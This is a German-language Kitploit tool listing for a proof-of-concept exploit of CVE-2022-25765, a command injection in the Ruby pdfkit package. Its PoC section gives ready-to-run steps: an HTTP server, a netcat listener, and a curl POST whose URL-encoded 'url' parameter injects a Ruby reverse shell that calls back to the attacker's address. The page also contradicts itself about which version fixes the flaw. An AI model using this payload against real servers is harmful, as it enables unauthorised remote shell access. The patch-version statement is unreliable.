Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
PDFkit-CMD-Injection — CVE-2022-25765 pdfkit <0.8.6 Befehlsinjektion. | Kitploit
Tools/GitHubGitHub/shamo0/pdfkit-cmd-injection
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationCommand and Control
GitHubshamo0/pdfkit-cmd-injection

PDFkit-CMD-Injection

CVE-2022-25765 pdfkit <0.8.6 Befehlsinjektion.

Repository anzeigen
162vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

PDFkit-CMD-Injection

CVE-2022-25765 pdfkit <0.8.6 Befehlseinschleusung.

Das Paket pdfkit ist anfällig für Befehlseinschleusung, da die URL nicht ordnungsgemäß bereinigt wird.

Hinweis: Dieses Problem wurde in 0.8.7.2 behoben, aber der Patch erwies sich als unwirksam. Die aktualisierte Patch-Version ist 0.8.7.2.

PoC

Starte einen HTTP-Server

root@kitploit:~
python3 -m http.server 80

Starte einen netcat-Listener

root@kitploit:~
nc -nlvp 4444

Führe eine Anfrage mit CURL aus

root@kitploit:~
curl 'TARGET_ADDRESS' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: TARGET_ADDRESS' -H 'Connection: keep-alive' -H 'Referer: TARGET_ADDRESS' -H 'Upgrade-Insecure-Requests: 1' --data-raw 'url=http%3A%2F%2FLOCAL-ADDRESS%3ALOCAL-PORT%2F%3Fname%3D%2520%60+ruby+-rsocket+-e%27spawn%28%22sh%22%2C%5B%3Ain%2C%3Aout%2C%3Aerr%5D%3D%3ETCPSocket.new%28%22LOCAL-ADDRESS%22%2CLOCAL-PORT%29%29%27%60'

Demo auf HTB-Maschine

screen1.png screen.2.png

Referenzen

  • https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795
  • https://vulert.com/vulnerability/rubygems-pdfkit-30907
Tool herunterladen